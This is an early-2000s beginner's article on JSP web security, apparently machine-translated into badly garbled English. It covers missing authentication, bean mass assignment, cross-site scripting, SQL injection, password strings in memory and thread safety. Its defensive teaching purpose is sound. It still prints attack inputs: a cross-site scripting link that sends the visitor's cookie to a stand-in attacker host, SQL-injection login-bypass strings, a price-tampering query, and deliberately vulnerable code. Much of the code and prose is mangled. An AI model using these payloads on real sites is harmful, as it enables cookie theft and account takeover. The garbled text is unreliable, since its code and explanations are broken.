Creation time: 2004-04-12
Article attribute: original
Article submission:
Stone_Star (Turbid_LIMPID_AT_HOTMAIL.COM)
Java Server Page (JSP) as a technique for establishing a dynamic web page is constantly warming. JSP and ASP, PHP, working mechanism are not the same. Generally speaking, the JSP page is compiled during execution, not explanatory. The first calling JSP file is actually a process of compiling as a servlet. When the browser requests this JSP file to the server, the server will check if the JSP file has changed since the last compiled. If there is no change, it will execute the servlet directly, and it is not necessary to recompile, so that efficiency has been significantly improved. .
?? Today I will talk to everyone from the perspective of script programming, such as source of security hazards, such as source exposure, are not within the scope of this article. The main purpose of writing this article is to give the beginner JSP programming friends to wake up, from the beginning, we must cultivate a sense of security programming, do not make mistakes that should not be made to avoid the loss of avoidance. In addition, I am also an initiator, please post if there is a mistake or other comments.
First, the certification is not strict - low-level mistakes
?? In the Western Forum V1.12 revision,
User_manager.jsp is the user-managed page, the author knows its sensitivity, plus a lock:
IF (("" ") == NULL) ││ (" UserClass ") == NULL) ││ (! Session.getValue (" UserClass "). Equals (" System Administrator " )))))))
{
Response.sendRedirect ("Err.jsp? ID = 14");
Return;
}
?? If you want to view, modify the information of a user, you must use the modifyuser_manager.jsp this file. Administrator submit
Http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51
That is to view, the information of the user who modifies the ID 51 (the administrator's default user ID is 51). However, such an important file lacks authentication, ordinary users (including tourists) also directly submit the above request, and there is no such thing as a list (password is also a plain text storage, displayed). Modifyuser_manage.jsp also is the portal open until the malicious user performs the operation of the data update, and he will see the wrong display of the wrong display when the data update is performed. Obviously, it is not enough to lock a door. When programming, you must not be annoying to add an identity authentication for each of the added identity.
Second, keep the entrance to javabean
The core of JSP component technology is a Java component called bean. In the program, logic control, database operations are placed in the JavaBeans component, then call it in the JSP file, which increases the clarity of the program and the reusability of the program. The JSP page is very concise compared to traditional ASP or PHP pages, because many dynamic page processing can be encapsulated into JavaBean.
?? To change the JavaBean property, use "
"mark.
The following code is part of the source code of an electronic shopping system, which is used to display information in the user's shopping box, and checkout.jsp is used to check out.
Your Basket
You have added the item
To your basket. ?? Your Total IS $ proceed to checkout ?? Note Property = "*"? This indicates that the user enters in the visible JSP page, or the value of all variables submitted directly through the query string will be stored in the matching bea property. Generally, the user is the submit request: http://www.somesite.com /addtobasket.jsp?newItem=Item0105342 But what is the user who does not defend? They may be submitted: http://www.somesite.com /addtobasket.jsp?newitem=Item0105342&balance=0 This information is stored in JavaBean in the JavaBean. When they click "Chekout" to check out, the cost is free. ?? This is the same as the security problem caused by global variables in PHP. This shows: "Property =" * "" must be used with caution! Third, Changsheng's non-declined cross-station script ?? Cross Scripting Attack refers to the HTML code in the remote web page, inserts malicious JavaScript, Vbscript, Activex, HTML, or Flash and other scripts, stealing browsing The privacy of the user of this page changes the user's settings, and disrupts the user's data. Cross-station scripting attacks do not affect the operation of the server and web program in most cases, but the security of the client constitutes a serious threat. ?? The simplest example is made by the imitation network's A cherry forum (beta-1). When we submit http://www.somesite.com/acjspbbs/dispuser.jsp?name =someuser<;Script>Alert (Document.cuokie) The dialog box contains your own cookie information. Submit http://www.somesite.com/acjspbbs/dispuser.jsp?name =someuser<;script ketocument.location='http://www.163.com 'to redirect to Netease. Since the script does not perform any encoding or filter malicious code when returning to the "Name" variable, the script code will be executed on the user browser when the user accesses the malicious "Name" variable data link. It may lead to consequences such as user privacy. For example, the link below: http://www.somesite.com/acjspbbs/dispuser.jsp?name =someuser<;script>Document.location='Http://www.hackersite.com/xxx.xxx? ketocument .kekie xxx.xxx is used to collect the parameters of the side, and the parameters here are Document.cookie, which is the cookie of the user who is accessing this link. In the ASP world, many people have practiced the technology of stealing cookie. In JSP, reading cookies is not difficult. Of course, the cross-station script will never be limited to the function of stealing cookie, I believe everyone has a certain understanding, here is not expanding. ?? The inputs and outputs of all dynamic pages should be encoded, which can greatly avoid attacks of cross-station scripts. Unfortunately, all invisible data codes is a resource-intensive job that will affect the performance of the Web server.
Commonly used means are also filtered, such as the following code, replace the dangerous characters: <% string message = request.getParameter ("Message"); message = message.replace ('<', '_') Message = message.replace ('>', '_'); message = message.replace ('"', '_'); message = message.replace ('/' ',' _ '); message = message .replace ('%', '_'); message = message.replace (';', '_'); message = message.replace ('(', '_'); message = message.replace (') ',' _ '); message = message.replace (' & ',' _ '); message = message.replace (' ',' _ ');%> ?? More active way is to use regular expressions Only the specified character is allowed: public boolean isvalidinput (str.matches ("[a-z0-9] ")) Return True; Else Return false;} four, keep in mind SQL injection ?? Programming Books don't pay attention to the training of safety programs when they are getting started, and the famous "JSP Programming Thought and Practice" is to demonstrate the login system with databases to beginners (Database mysql) ): Statement stmt = conn.createStatement (); String checkUser = "select * from login where username = '" userName "' and userpassword = '" userPassword "'"; ResultSet rs = stmt.executeQuery (checkUser) ; if (rs.next ()) ?? response.sendredirect ("sucsslogin.jsp"); else ?? response.sendredirect ("FAI LURELOGIN.JSP "); ?? This makes the book of the book for a long time to use such a sense of" with holes "login code.
If there is a user named "jack" in the database, then at least the following methods can be logged in without knowing the password: Username: jack password: 'or' a '=' a username: jack password: 'or 1 = 1 / * User Name: Jack' OR 1 = 1 / * Password: (Arbitrary) LYBBS (Ling Yun Forum) Ver 2.9.server In Loginout.java is the data submitted by the login submitted: IF ( S.Equals ("") │ │ S1.Equals ("")) ?? throw new useerexception ("User name or password is not empty."); if (S.Indexof ("'")! = -1 ││ S.indexof ("/")! = -1 ││ s.indexof (",")! = -1 ││ sindexof ("//")! = -1) ?? throw new userexception (" The username cannot include '/ "//, and other illegal characters."); If (S1.IndexOf ("'")! = -1 ││ s1.indexof ("/")! = -1 ││ S1. IndexOf ("*")! = -1 ││ s1.indexof ("//")! = -1) ???? throw new useEREXCEPTION ("Password cannot include illegal characters such as' /" // *. ") ; if (S.StartSwith ("") ││ S1.StartSwith (")) ?????? throw new useXception (" The username or password cannot be used in space. "); ?? But I don't know why He only filters an asterisk for the user name. In addition, the forward slash should also be listed in "Blacklist". I still think that only the regular expression allows only characters within the specified range to be simply. ?? Here you must remind: Don't think you can effectively resist all attacks with some database systems. PINKEYES's "PHP Injection Instance" has gave the "Magic_QUOTES_GPC = ON" in the PHP configuration file. 5. The hidden dangers brought by String objects? The Java platform does make security programming more convenient. There is no pointer in Java, which means that the Java program is no longer like c to address any memory location in the address space. When the JSP file is compiled into a .class file, it is checked when it is checked, for example, when an attempt to access an array element that exceeds an array size will be rejected, which greatly avoids the buffer overflow attack. However, String objects will bring us some security hazards. If the password is stored in the Java String object, the password will always reside in memory until the garbage collection or process is terminated. Even if garbage collection is performed, it still exists in the idle memory heap until the memory space is reused. The longer the password String resides in memory, the greater the danger of being eavesdropped. Worse, if the actual memory is reduced, the operating system will convert this password String to the switch to the disk, so it is easy to suffer from disk block eavesdropping attacks.
In order to minimize this leakage (but not eliminated), you should store your password in the char array and zero it after use (String is not variable, no need to zero it). Sixth, thread safety is prematured ?? "Java can do, JSP can do". Unlike ASP, PHP, etc., the JSP is executed by a multi-threaded manner by default. Performing a multi-threaded manner can greatly reduce the resource requirements of the system, improve the system's concurrency and response time. Threads are independent, concurrent execution paths in the program, each thread has its own stack, its own program counter, and its own local variable. Although most of the operations in multi-threaded applications are parallel, some operations (such as updating global flags or handling sharing files) cannot be performed in parallel. If you don't do the synchronization of threads, when you have a big and annual access, you don't need malicious users' "enthusiastic participation", the problem will also appear. The easiest solution is to add: <% @ page isthreadsafe = "false"%> instructions in related JSP files, making it executed in a single-threaded manner, at this time, all clients are executed in a serial manner. This will seriously reduce the performance of the system. We can still let JSP files perform in multi-threaded manner, synchronize threads by locking the function. A function adds a lock with the synchronized keyword. Look at the following example: public class myclass {?? int A; ?? public init () {// This method can be called multiple threads simultaneously call ?????? a = 0; ??} ?? public synchronized void set () {// Two threads can't call this method at the same time ?????? IF (a> 5) {?????????? a = a-5; ??????}? ?}} ?? But this still has a certain impact on the performance of the system. A better solution is to use local variables instead of instance variables. Since the instance variable is allocated in the heap, all thread sharing belonging to this instance is not a thread secure, and the local variable is allocated in the stack, because each thread has its own stack space, so thus thread is safe. .
